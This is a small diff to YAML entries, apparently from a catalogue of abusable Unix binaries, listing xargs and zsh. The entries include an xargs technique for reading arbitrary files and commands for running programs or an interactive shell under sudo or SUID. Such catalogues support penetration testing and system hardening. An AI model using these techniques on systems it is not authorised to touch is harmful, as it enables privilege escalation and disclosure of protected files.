- code: xargs -a /dev/null /usr/bin/id - code: xargs -a /dev/null /usr/bin/id
file-read: file-read:
- description: This works as long as the file does not contain the NUL character, - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
GNU version only.
code: | code: |
LFILE=file_to_read LFILE=file_to_read
xargs -a "$LFILE" -0 xargs -a "$LFILE" -0
suid-enabled: suid-enabled:
- code: "./xargs -a /dev/null /usr/bin/id" - code: ./xargs -a /dev/null /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo xargs -a /dev/null /usr/bin/id - code: sudo xargs -a /dev/null /usr/bin/id
--- ---


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: zsh - code: zsh
suid-enabled: suid-enabled:
- code: "./zsh" - code: ./zsh
sudo-enabled: sudo-enabled:
- code: sudo zsh - code: sudo zsh
--- ---